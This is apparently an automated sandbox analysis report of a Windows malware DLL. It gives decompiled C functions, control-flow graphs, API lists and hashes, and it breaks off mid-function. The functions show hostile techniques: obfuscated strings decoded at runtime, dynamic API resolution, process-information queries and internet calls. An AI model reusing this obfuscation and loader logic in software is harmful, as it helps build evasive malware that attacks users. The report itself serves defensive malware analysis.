                                                      C-Code - Quality: 91%
                                                      			E6E77865C(void* __ecx, void* __esi, void* _a4, DWORD* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				int _t51;
				long _t58;
				void* _t62;
				void* _t66;
				long _t68;
				void* _t70;

				_t66 = __ecx;
				_v32 = 0x35;
				_v31 = 0x1a;
				_v30 = 0x68;
				_v29 = 0x24;
				_v28 = 0x4e;
				_v27 = 0x1a;
				_v26 = 0x24;
				_v25 = 0x68;
				_v24 = 0x1e;
				_v23 = 0x75;
				_v22 = 0x24;
				_v21 = 0x4e;
				_v20 = 0x2a;
				_v19 = 0x73;
				_v18 = 0x6f;
				_v17 = 0x68;
				_v16 = 0x6f;
				_v15 = 0x4c;
				_v14 = 3;
				_v13 = 0x6f;
				_v12 = 0x58;
				_t58 = 0;
				_v11 = 0;
				_v10 = 0x6f;
				_v9 = 0x7c;
				_v8 = 0;
				_v7 = 0x24;
				_v6 = 0x78;
				_v5 = 0;
				if(_v5 == 0) {
					_push(0x7f);
					_t68 = 0;
					do {
						_t62 = 0x78;
						asm("cdq");
						asm("cdq");
						 *(_t70 + _t68 - 0x1c) = (0 + (_t62 - ( *(_t70 + _t68 - 0x1c) & 0x000000ff)) * 0x27 % 0) % 0;
						_t68 = _t68 + 1;
					} while (_t68 < 0x1b);
					_v5 = 1;
					_t58 = 0;
				}
				E6E77657F(_t66,  &_v32);
				_t51 = InternetQueryDataAvailable(_a4, _a8, _t58, _t58); // executed
				return _t51;
			}





































                                                      0x6e778664
                                                      0x6e778666
                                                      0x6e77866a
                                                      0x6e77866e
                                                      0x6e778672
                                                      0x6e778676
                                                      0x6e77867a
                                                      0x6e77867e
                                                      0x6e778682
                                                      0x6e778686
                                                      0x6e77868a
                                                      0x6e77868e
                                                      0x6e778692
                                                      0x6e778696
                                                      0x6e77869a
                                                      0x6e77869e
                                                      0x6e7786a2
                                                      0x6e7786a6
                                                      0x6e7786aa
                                                      0x6e7786ae
                                                      0x6e7786b2
                                                      0x6e7786b6
                                                      0x6e7786ba
                                                      0x6e7786bc
                                                      0x6e7786bf
                                                      0x6e7786c3
                                                      0x6e7786c7
                                                      0x6e7786ca
                                                      0x6e7786ce
                                                      0x6e7786d5
                                                      0x6e7786db
                                                      0x6e7786de
                                                      0x6e7786e0
                                                      0x6e7786e3
                                                      0x6e7786ec
                                                      0x6e7786f2
                                                      0x6e7786f8
                                                      0x6e7786fb
                                                      0x6e7786ff
                                                      0x6e778700
                                                      0x6e778705
                                                      0x6e778709
                                                      0x6e77870b
                                                      0x6e778712
                                                      0x6e77871f
                                                      0x6e778724

                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000058,0000006F,00000000,00000000,00000035,00000000,766F14B9), ref: 6E77871F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AvailableDataInternetQuery
                                                      • String ID: $$$$$$$$*$5$L$N$N$X$h$h$h$o$o$o$o$s$u$x$|
                                                      • API String ID: 2430348039-3265153274
                                                      • Opcode ID: 5b7940fab4c0bf93d795f16f4b117f843e463824f8fe71eb739fd0678275f000
                                                      • Instruction ID: 49a112f2b12fb731f0ff0e6a38094bf97075ae91cdfb996fe8bb9330d2a4d468
                                                      • Opcode Fuzzy Hash: 5b7940fab4c0bf93d795f16f4b117f843e463824f8fe71eb739fd0678275f000
                                                      • Instruction Fuzzy Hash: C9313E11D0C2CDA8FF12D6EC94587EEBFA54B22208F4880D9D4846B293C6BB075DD372
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E777A4B, Relevance: 29.8, APIs: 1, Strings: 16, Instructions: 67nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 702 6e777a4b-6e777ac7 703 6e777af4-6e777b10 call 6e77657f NtQueryInformationProcess 702->703 704 6e777ac9-6e777ace 702->704 705 6e777acf-6e777aed 704->705 705->705 707 6e777aef-6e777af3 705->707 707->703
                                                      C-Code - Quality: 93%
                                                      			E6E777A4B(void* __ecx, void* __edi, void* _a4, void* _a12, long* _a20) {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				long _t51;
				void* _t61;
				signed int _t65;
				void* _t67;
				void* _t68;

				_t67 = __ecx;
				_v32 = 0x7c;
				_v31 = 0x4d;
				_v30 = 0xa;
				_v29 = 0x27;
				_v28 = 0xc;
				_v27 = 0x1a;
				_v26 = 0xe;
				_v25 = 0x3c;
				_v24 = 0x33;
				_v23 = 0x65;
				_v22 = 0xd;
				_v21 = 0x1a;
				_v20 = 0x59;
				_v19 = 0x25;
				_v18 = 0x4d;
				_v17 = 0x72;
				_v16 = 0xd;
				_v15 = 0x33;
				_v14 = 0x30;
				_v13 = 0x1a;
				_v12 = 0xd;
				_v11 = 0x58;
				_v10 = 0xc;
				_v9 = 0x73;
				_v8 = 0x73;
				_v7 = 0x28;
				_v6 = 0;
				if(_v6 == 0) {
					_t61 = 0;
					_t65 = 0x7f;
					do {
						asm("cdq");
						asm("cdq");
						 *(_t68 + _t61 - 0x1c) = (_t65 + (( *(_t68 + _t61 - 0x1c) & 0x000000ff) - 0x28) * 0xa % _t65) % _t65;
						_t61 = _t61 + 1;
					} while (_t61 < 0x1a);
					_v6 = 1;
				}
				E6E77657F(_t67,  &_v32);
				_t51 = NtQueryInformationProcess(_a4, 0, _a12, 0x18, _a20); // executed
				return _t51;
			}



































                                                      0x6e777a52
                                                      0x6e777a54
                                                      0x6e777a58
                                                      0x6e777a5c
                                                      0x6e777a60
                                                      0x6e777a64
                                                      0x6e777a68
                                                      0x6e777a6c
                                                      0x6e777a70
                                                      0x6e777a74
                                                      0x6e777a78
                                                      0x6e777a7c
                                                      0x6e777a80
                                                      0x6e777a84
                                                      0x6e777a88
                                                      0x6e777a8c
                                                      0x6e777a90
                                                      0x6e777a94
                                                      0x6e777a98
                                                      0x6e777a9c
                                                      0x6e777aa0
                                                      0x6e777aa4
                                                      0x6e777aa8
                                                      0x6e777aac
                                                      0x6e777ab0
                                                      0x6e777ab4
                                                      0x6e777ab8
                                                      0x6e777abf
                                                      0x6e777ac7
                                                      0x6e777acc
                                                      0x6e777ace
                                                      0x6e777acf
                                                      0x6e777adc
                                                      0x6e777ae2
                                                      0x6e777ae5
                                                      0x6e777ae9
                                                      0x6e777aea
                                                      0x6e777aef
                                                      0x6e777af3
                                                      0x6e777afa
                                                      0x6e777b0c
                                                      0x6e777b10

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(0000000D,00000000,00000059,00000018,0000000C,0000007C), ref: 6E777B0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: %$'$($0$3$3$<$M$M$X$Y$e$r$s$s$|
                                                      • API String ID: 1778838933-2868486639
                                                      • Opcode ID: 8f28e57ba465c02a89e90814447a603bf79f6a74d5d0f814525b4641bf852f03
                                                      • Instruction ID: 5982bc0cee86c8f905eda3de71f4a631d2d92e0b4a690d09e29ce4c97d1a2cb7
                                                      • Opcode Fuzzy Hash: 8f28e57ba465c02a89e90814447a603bf79f6a74d5d0f814525b4641bf852f03
                                                      • Instruction Fuzzy Hash: A731FD10D0D2C9A8FF02C6EC94197DEBFB54F22308F0880DAD4946A292C6FE4719D7B6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E777B4D, Relevance: 29.8, APIs: 1, Strings: 16, Instructions: 38comCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 709 6e777b4d-6e777bc6 call 6e7721a1 call 6e77657f CoCreateInstance
                                                      C-Code - Quality: 58%
                                                      			E6E777B4D(void* __ecx, intOrPtr _a20) {
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				intOrPtr* _t24;
				void* _t25;

				_v24 = 0x74;
				_v23 = 0x41;
				_v22 = 0x74;
				_v21 = 0x18;
				_v20 = 0x75;
				_v19 = 0x57;
				_v18 = 0x27;
				_v17 = 0x75;
				_v16 = 0x22;
				_v15 = 0x79;
				_v14 = 0x5f;
				_v13 = 0x27;
				_v12 = 0x57;
				_v11 = 0x79;
				_v10 = 0x66;
				_v9 = 0x75;
				_v8 = 0x3a;
				_v7 = 0;
				_t24 = E6E77657F(__ecx, E6E7721A1( &_v24));
				_t25 =  *_t24(0x6e7851a0, 0, 4, 0x6e785190, _a20); // executed
				return _t25;
			}























                                                      0x6e777b53
                                                      0x6e777b57
                                                      0x6e777b5b
                                                      0x6e777b5f
                                                      0x6e777b63
                                                      0x6e777b67
                                                      0x6e777b6b
                                                      0x6e777b6f
                                                      0x6e777b73
                                                      0x6e777b77
                                                      0x6e777b7b
                                                      0x6e777b7f
                                                      0x6e777b83
                                                      0x6e777b87
                                                      0x6e777b8b
                                                      0x6e777b8f
                                                      0x6e777b94
                                                      0x6e777ba0
                                                      0x6e777bac
                                                      0x6e777bc2
                                                      0x6e777bc6

                                                      APIs
                                                        • Part of subcall function 6E77657F: GetProcAddress.KERNEL32(0000000C,00000000,0000000C,?,6E777BB1,00000000), ref: 6E77658E
                                                      • CoCreateInstance.OLE32(6E7851A0,00000000,00000004,6E785190,?,00000000), ref: 6E777BC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AddressCreateInstanceProc
                                                      • String ID: "$'$'$:$A$W$W$_$f$t$t$u$u$u$y$y
                                                      • API String ID: 3294483735-526281395
                                                      • Opcode ID: e12d4449e753776883dd4e34688d456a69de7ff8957125d9004805d1ac4beaf7
                                                      • Instruction ID: 640b968bdbecebb10d679d08b6e6c1e1de3bae2c87c562edabf84d9b207a4262
                                                      • Opcode Fuzzy Hash: e12d4449e753776883dd4e34688d456a69de7ff8957125d9004805d1ac4beaf7
                                                      • Instruction Fuzzy Hash: 9F11C010D0C2C9E8EF12D6E899087DEBEA50B2234CF4840C895983B292C6FE1709D376
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E776CEB, Relevance: 315.8, APIs: 12, Strings: 168, Instructions: 838memorystringnetworkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 6e776ceb-6e776d03 call 6e7843cb call 6e7766b9 5 6e776d05-6e776d0d call 6e77111c call 6e77549f 0->5 6 6e776d12-6e776da1 call 6e77111c 0->6 5->6 12 6e776da3 6->12 13 6e776dd2-6e776e87 call 6e77657f call 6e77111c 6->13 14 6e776da5-6e776dc9 12->14 21 6e776ec0-6e776ee6 call 6e77657f 13->21 22 6e776e89-6e776e8d 13->22 14->14 16 6e776dcb 14->16 16->13 28 6e776efd-6e776f00 21->28 29 6e776ee8 21->29 23 6e776e8e-6e776eb4 22->23 23->23 25 6e776eb6-6e776eb9 23->25 25->21 30 6e776f06-6e776f23 28->30 31 6e77707b-6e7771b0 call 6e77111c call 6e775423 28->31 32 6e776eea-6e776ef0 29->32 33 6e776f25-6e776f27 30->33 34 6e776f4c-6e776f71 lstrcpyW call 6e77c228 30->34 50 6e7771e3-6e7771fc call 6e77111c call 6e776599 31->50 51 6e7771b2 31->51 36 6e776ef6-6e776ef9 32->36 37 6e776ef2-6e776ef3 32->37 38 6e776f28-6e776f46 33->38 45 6e776f73-6e776f89 call 6e77111c call 6e775423 call 6e77111c call 6e77549f 34->45 46 6e776f8e-6e777025 call 6e77111c 34->46 36->32 41 6e776efb 36->41 37->36 38->38 42 6e776f48 38->42 41->28 42->34 45->46 57 6e777027-6e77702b 46->57 58 6e77705c-6e777078 call 6e77657f 46->58 69 6e7771fe-6e77720f call 6e77111c call 6e7752ed 50->69 70 6e777239-6e77735c 50->70 55 6e7771b4-6e7771da 51->55 55->55 56 6e7771dc 55->56 56->50 61 6e77702c-6e777050 57->61 58->31 61->61 65 6e777052-6e777055 61->65 65->58 84 6e777211-6e777227 call 6e77111c call 6e77516c call 6e77111c call 6e77549f 69->84 85 6e77722c-6e777234 call 6e77111c call 6e77516c 69->85 73 6e77738f-6e7773ab call 6e77111c call 6e776599 70->73 74 6e77735e 70->74 87 6e7773e0-6e777477 call 6e77111c call 6e775d06 call 6e77657f CoInitializeEx 73->87 88 6e7773ad-6e7773be call 6e77111c call 6e7752ed 73->88 77 6e777360-6e777386 74->77 77->77 80 6e777388 77->80 80->73 84->85 85->70 111 6e77748c-6e777490 87->111 112 6e777479-6e777487 call 6e776cd4 call 6e77111c call 6e77549f 87->112 88->87 107 6e7773c0-6e7773db call 6e77111c call 6e77516c call 6e77111c call 6e77549f 88->107 107->87 116 6e777497-6e777516 call 6e77111c 111->116 117 6e777492 call 6e776741 111->117 112->111 125 6e77754f-6e77756c call 6e77657f InternetOpenA 116->125 126 6e777518-6e77751c 116->126 117->116 135 6e777581-6e7775aa call 6e773b7e 125->135 136 6e77756e-6e77757c call 6e776cd4 call 6e77111c call 6e77549f 125->136 129 6e77751d-6e777543 126->129 129->129 133 6e777545-6e777548 129->133 133->125 142 6e777a02-6e777a41 call 6e77111c call 6e778517 call 6e776cd4 call 6e77111c call 6e77549f call 6e773be3 call 6e774040 call 6e784386 135->142 143 6e7775b0-6e7775e0 135->143 136->135 144 6e777606-6e777697 call 6e773ccb call 6e77111c call 6e7750b1 143->144 145 6e7775e2-6e777600 143->145 162 6e7776ca-6e77775a lstrcpyW call 6e77111c call 6e774ff4 144->162 163 6e777699 144->163 145->145 148 6e777602 145->148 148->144 175 6e77775c-6e777780 162->175 176 6e777788-6e7777a2 162->176 165 6e77769b-6e7776c1 163->165 165->165 168 6e7776c3 165->168 168->162 175->175 179 6e777782-6e777786 175->179 180 6e7777a4 176->180 181 6e7777ce-6e7777f4 call 6e773c02 176->181 179->176 183 6e7777a6-6e7777c6 180->183 188 6e7779e7-6e7779ed 181->188 189 6e7777fa-6e777823 call 6e77111c call 6e773efc 181->189 183->183 186 6e7777c8-6e7777cc 183->186 186->181 191 6e7779ef-6e7779f8 call 6e77111c call 6e778517 188->191 192 6e7779fd-6e7779ff 188->192 199 6e7779d5-6e7779e1 call 6e77111c call 6e7752ed 189->199 200 6e777829-6e777830 189->200 191->192 192->142 202 6e7779e4 199->202 201 6e777836-6e77786b call 6e773015 * 2 call 6e774985 200->201 200->202 201->202 213 6e777871-6e777884 201->213 202->188 214 6e7779c3-6e7779d3 GetProcessHeap HeapFree 213->214 215 6e77788a-6e777892 213->215 214->202 215->214 216 6e777898-6e7778ad GetProcessHeap HeapAlloc 215->216 216->214 217 6e7778b3-6e777955 call 6e77111c call 6e774f2b 216->217 222 6e777957-6e77795b 217->222 223 6e77798f-6e7779b0 lstrcpyA call 6e777bc9 217->223 224 6e77795c-6e777980 222->224 227 6e7779b5-6e7779bd GetProcessHeap HeapFree 223->227 224->224 226 6e777982-6e777988 224->226 226->223 227->214
                                                      C-Code - Quality: 86%
                                                      			E6E776CEB(void* __ecx, void* __edi, void* __eflags) {
				void* _t512;
				void* _t517;
				intOrPtr* _t521;
				void _t522;
				void* _t528;
				intOrPtr _t532;
				void* _t533;
				void* _t535;
				intOrPtr* _t536;
				void* _t537;
				void* _t538;
				void* _t542;
				void* _t544;
				void* _t545;
				signed int _t557;
				intOrPtr _t573;
				void* _t583;
				void* _t586;
				void* _t594;
				void* _t595;
				signed int _t616;
				signed int _t623;
				signed int _t629;
				signed int _t636;
				signed int _t645;
				signed int _t661;
				signed int _t675;
				signed int _t685;
				intOrPtr* _t689;
				signed int _t696;
				signed int _t707;
				void _t726;
				void _t727;
				void _t729;
				signed int _t733;
				signed int _t734;
				char _t739;
				signed int _t746;
				void* _t753;
				signed int _t756;
				char _t758;
				void* _t759;
				void* _t765;
				void* _t769;
				void* _t770;
				void* _t772;
				void* _t774;
				void* _t780;
				void* _t784;
				void* _t787;
				void* _t791;
				long _t793;
				signed int _t813;
				void* _t814;
				signed int _t815;
				signed int _t816;
				void* _t818;
				void* _t819;
				signed int _t820;
				void* _t821;
				signed int _t822;
				void* _t824;
				void* _t826;
				void* _t827;
				char _t828;
				void* _t829;
				char* _t830;
				char* _t831;
				char* _t832;
				signed int _t833;
				void* _t834;
				void* _t835;
				void* _t836;

				_t812 = __edi;
				_push(0x158);
				E6E7843CB();
				if(E6E7766B9(__edi, __eflags) != 0) {
					E6E77549F(E6E77111C(), _t812, 0);
				}
				 *(_t835 - 0x28) = 0;
				_t512 = E6E77111C();
				 *((char*)(_t835 - 0xc0)) = 0x15;
				_t821 = _t512;
				 *((char*)(_t835 - 0xbf)) = 0xd;
				 *((char*)(_t835 - 0xbe)) = 9;
				 *((char*)(_t835 - 0xbd)) = 0x27;
				 *((char*)(_t835 - 0xbc)) = 0x5f;
				 *((char*)(_t835 - 0xbb)) = 0x68;
				 *((char*)(_t835 - 0xba)) = 0x68;
				 *((char*)(_t835 - 0xb9)) = 0x1f;
				 *((char*)(_t835 - 0xb8)) = 0x24;
				 *((char*)(_t835 - 0xb7)) = 0x51;
				 *((char*)(_t835 - 0xb6)) = 0x3e;
				 *((char*)(_t835 - 0xb5)) = 0x7a;
				 *((char*)(_t835 - 0xb4)) = 0x24;
				 *((char*)(_t835 - 0xb3)) = 0xd;
				 *((char*)(_t835 - 0xb2)) = 0x4c;
				 *((char*)(_t835 - 0xb1)) = 0x17;
				 *((char*)(_t835 - 0xb0)) = 0;
				_t813 = 0x7f;
				if( *((intOrPtr*)(_t835 - 0xb0)) == 0) {
					_t793 = 0;
					do {
						asm("cdq");
						asm("cdq");
						 *(_t835 + _t793 - 0xc0) = (_t813 + (( *(_t835 + _t793 - 0xc0) & 0x000000ff) - 0x17) * 0x1c % _t813) % _t813;
						_t793 = _t793 + 1;
					} while (_t793 < 0x10);
					 *((char*)(_t835 - 0xb0)) = 1;
				}
				_t726 =  *((intOrPtr*)(E6E77657F(_t821, _t835 - 0xc0)))();
				 *(_t835 - 0x70) = _t726;
				_t517 = E6E77111C();
				 *((char*)(_t835 - 0xfc)) = 0x3e;
				_t814 = _t517;
				 *((char*)(_t835 - 0xfb)) = 0x7e;
				 *((char*)(_t835 - 0xfa)) = 0x64;
				 *((char*)(_t835 - 0xf9)) = 0x64;
				 *((char*)(_t835 - 0xf8)) = 0x47;
				 *((char*)(_t835 - 0xf7)) = 0x71;
				 *((char*)(_t835 - 0xf6)) = 0x6e;
				 *((char*)(_t835 - 0xf5)) = 0x34;
				 *((char*)(_t835 - 0xf4)) = 0x30;
				 *((char*)(_t835 - 0xf3)) = 0x71;
				 *((char*)(_t835 - 0xf2)) = 0x7b;
				 *((char*)(_t835 - 0xf1)) = 0x1d;
				 *((char*)(_t835 - 0xf0)) = 0x7e;
				 *((char*)(_t835 - 0xef)) = 0x24;
				 *((char*)(_t835 - 0xee)) = 0x26;
				 *((char*)(_t835 - 0xed)) = 0x16;
				 *((char*)(_t835 - 0xec)) = 0x5a;
				 *((char*)(_t835 - 0xeb)) = 0x44;
				 *((char*)(_t835 - 0xea)) = 0x50;
				 *((char*)(_t835 - 0xe9)) = 0;
				if( *((intOrPtr*)(_t835 - 0xe9)) == 0) {
					_t834 = 0;
					_t734 = 0x7f;
					do {
						_t791 = 0x50;
						asm("cdq");
						asm("cdq");
						 *(_t835 + _t834 - 0xfc) = (_t734 + (_t791 - ( *(_t835 + _t834 - 0xfc) & 0x000000ff)) * 0x27 % _t734) % _t734;
						_t834 = _t834 + 1;
					} while (_t834 < 0x13);
					_t726 =  *(_t835 - 0x70);
					 *((char*)(_t835 - 0xe9)) = 1;
				}
				_t75 = _t814 + 0x14; // 0x14
				_t521 = E6E77657F(_t75, _t835 - 0xfc);
				_t522 =  *_t521(_t726, _t835 - 0x28);
				_t795 =  *(_t835 - 0x28);
				_t739 = 0;
				_t815 = _t795;
				_t727 = _t522;
				 *(_t835 - 0x70) = _t727;
				_t822 = 0;
				if(_t815 > 0) {
					do {
						if( *((intOrPtr*)( *((intOrPtr*)(_t727 + _t822 * 4)))) == 0) {
							_t795 = _t795 - 1;
							 *(_t835 - 0x28) = _t795;
						}
						_t822 = _t822 + 1;
					} while (_t822 < _t815);
					_t739 = 0;
				}
				if(_t795 > 1) {
					 *((intOrPtr*)(_t835 - 0x58)) = _t739;
					 *(_t835 - 0x64) = 7;
					 *((char*)(_t835 - 0x63)) = 0x3a;
					 *((char*)(_t835 - 0x62)) = 0x3a;
					 *((char*)(_t835 - 0x61)) = 0x3a;
					 *((char*)(_t835 - 0x60)) = _t739;
					if( *((char*)(_t835 - 0x60)) == 0) {
						_t833 = 0x7f;
						do {
							asm("cdq");
							_t707 = _t833 + (( *(_t835 + _t739 - 0x64) & 0x000000ff) - 0x3a) * 0x22 % _t833;
							asm("cdq");
							_t795 = _t707 % _t833;
							 *(_t835 + _t739 - 0x64) = _t707 % _t833;
							_t739 = _t739 + 1;
						} while (_t739 < 4);
						 *((char*)(_t835 - 0x60)) = 1;
					}
					lstrcpyW(_t835 - 0x38, _t835 - 0x64);
					_t822 = E6E77C228( *((intOrPtr*)(_t727 + 4)), _t835 - 0x38, _t835 - 0x58);
					_t836 = _t836 + 0xc;
					if(_t822 == 0) {
						E6E775423(E6E77111C(), _t815, _t727);
						E6E77549F(E6E77111C(), _t815, 1);
					}
					 *((intOrPtr*)(_t835 - 0x5c)) = 0;
					_t685 = E6E77111C();
					 *((char*)(_t835 - 0xd4)) = 0x47;
					_t815 = _t685;
					 *((char*)(_t835 - 0xd3)) = 0x5e;
					 *((char*)(_t835 - 0xd2)) = 0x2a;
					 *((char*)(_t835 - 0xd1)) = 0x42;
					 *((char*)(_t835 - 0xd0)) = 0x2f;
					 *((char*)(_t835 - 0xcf)) = 2;
					 *((char*)(_t835 - 0xce)) = 2;
					 *((char*)(_t835 - 0xcd)) = 0x74;
					 *((char*)(_t835 - 0xcc)) = 0x4a;
					 *((char*)(_t835 - 0xcb)) = 0x2a;
					 *((char*)(_t835 - 0xca)) = 0x6d;
					 *((char*)(_t835 - 0xc9)) = 0x6a;
					 *((char*)(_t835 - 0xc8)) = 0x4a;
					 *((char*)(_t835 - 0xc7)) = 7;
					 *((char*)(_t835 - 0xc6)) = 0x5e;
					 *((char*)(_t835 - 0xc5)) = 0x18;
					 *((char*)(_t835 - 0xc4)) = 0x61;
					 *((char*)(_t835 - 0xc3)) = 0;
					if( *((intOrPtr*)(_t835 - 0xc3)) == 0) {
						_t787 = 0;
						_t733 = 0x7f;
						do {
							asm("cdq");
							_t696 = _t733 + (( *(_t835 + _t787 - 0xd4) & 0x000000ff) - 0x61) * 0x33 % _t733;
							asm("cdq");
							_t795 = _t696 % _t733;
							 *(_t835 + _t787 - 0xd4) = _t696 % _t733;
							_t787 = _t787 + 1;
						} while (_t787 < 0x11);
						_t727 =  *(_t835 - 0x70);
						 *((char*)(_t835 - 0xc3)) = 1;
					}
					_t689 = E6E77657F(_t815, _t835 - 0xd4);
					 *_t689(_t822, 0x11a, "C:\Users\Albus\ndgfht.frg", _t835 - 0x5c);
				}
				_t740 = E6E77111C();
				E6E775423(_t523, _t815, _t727);
				 *((char*)(_t835 - 0x128)) = 0x5b;
				 *((char*)(_t835 - 0x127)) = 0x6a;
				 *((char*)(_t835 - 0x126)) = 0x49;
				 *((char*)(_t835 - 0x125)) = 0x46;
				 *((char*)(_t835 - 0x124)) = 0x6a;
				 *((char*)(_t835 - 0x123)) = 0x2a;
				 *((char*)(_t835 - 0x122)) = 0x59;
				 *((char*)(_t835 - 0x121)) = 0x17;
				 *((char*)(_t835 - 0x120)) = 0xc;
				 *((char*)(_t835 - 0x11f)) = 0x6c;
				 *((char*)(_t835 - 0x11e)) = 0x6a;
				 *((char*)(_t835 - 0x11d)) = 0x1a;
				 *((char*)(_t835 - 0x11c)) = 0x38;
				 *((char*)(_t835 - 0x11b)) = 0x59;
				 *((char*)(_t835 - 0x11a)) = 0x6c;
				 *((char*)(_t835 - 0x119)) = 0x38;
				 *((char*)(_t835 - 0x118)) = 0x67;
				 *((char*)(_t835 - 0x117)) = 0x1a;
				 *((char*)(_t835 - 0x116)) = 0x59;
				 *((char*)(_t835 - 0x115)) = 0x6c;
				 *((char*)(_t835 - 0x114)) = 0x75;
				 *((char*)(_t835 - 0x113)) = 0xc;
				 *((char*)(_t835 - 0x112)) = 0x67;
				 *((char*)(_t835 - 0x111)) = 0x67;
				 *((char*)(_t835 - 0x110)) = 0x6c;
				 *((char*)(_t835 - 0x10f)) = 0x2a;
				 *((char*)(_t835 - 0x10e)) = 0x78;
				 *((char*)(_t835 - 0x10d)) = 0x46;
				 *((char*)(_t835 - 0x10c)) = 0x38;
				 *((char*)(_t835 - 0x10b)) = 9;
				 *((char*)(_t835 - 0x10a)) = 0x38;
				 *((char*)(_t835 - 0x109)) = 0x46;
				 *((char*)(_t835 - 0x108)) = 0x75;
				 *((char*)(_t835 - 0x107)) = 0x75;
				 *((char*)(_t835 - 0x106)) = 0x7a;
				 *((char*)(_t835 - 0x105)) = 0x7a;
				 *((char*)(_t835 - 0x104)) = 0x3b;
				 *((char*)(_t835 - 0x103)) = 0x3a;
				 *((char*)(_t835 - 0x102)) = 0x19;
				 *((char*)(_t835 - 0x101)) = 0;
				_t816 = 0x7f;
				if( *((intOrPtr*)(_t835 - 0x101)) == 0) {
					_t832 = 0;
					do {
						_t784 = 0x19;
						_t740 = _t784 - ( *(_t835 + _t832 - 0x128) & 0x000000ff);
						asm("cdq");
						_t675 = _t816 + (_t784 - ( *(_t835 + _t832 - 0x128) & 0x000000ff)) * 0x1b % _t816;
						asm("cdq");
						_t795 = _t675 % _t816;
						 *(_t835 + _t832 - 0x128) = _t675 % _t816;
						_t832 = _t832 + 1;
					} while (_t832 < 0x27);
					 *((char*)(_t835 - 0x101)) = 1;
				}
				_t741 = E6E77111C(); // executed
				_t528 = E6E776599(_t527, _t822, _t740, _t740, _t835 - 0x128); // executed
				_t823 = _t528;
				if(_t528 != 0) {
					if(E6E7752ED(E6E77111C(), _t816) == 0xb7) {
						E6E77516C(E6E77111C(), _t816, _t823);
						E6E77549F(E6E77111C(), _t816, 1);
					}
					_t741 = E6E77111C();
					E6E77516C(_t665, _t816, _t823);
				}
				 *((char*)(_t835 - 0x150)) = 0x7c;
				 *((char*)(_t835 - 0x14f)) = 0x5b;
				 *((char*)(_t835 - 0x14e)) = 0x3e;
				 *((char*)(_t835 - 0x14d)) = 0x27;
				 *((char*)(_t835 - 0x14c)) = 0x71;
				 *((char*)(_t835 - 0x14b)) = 0x75;
				 *((char*)(_t835 - 0x14a)) = 0x10;
				 *((char*)(_t835 - 0x149)) = 0x3e;
				 *((char*)(_t835 - 0x148)) = 0x27;
				 *((char*)(_t835 - 0x147)) = 0x78;
				 *((char*)(_t835 - 0x146)) = 0xd;
				 *((char*)(_t835 - 0x145)) = 0x57;
				 *((char*)(_t835 - 0x144)) = 0x10;
				 *((char*)(_t835 - 0x143)) = 0x75;
				 *((char*)(_t835 - 0x142)) = 0x78;
				 *((char*)(_t835 - 0x141)) = 0x41;
				 *((char*)(_t835 - 0x140)) = 0x75;
				 *((char*)(_t835 - 0x13f)) = 0x3d;
				 *((char*)(_t835 - 0x13e)) = 0xc;
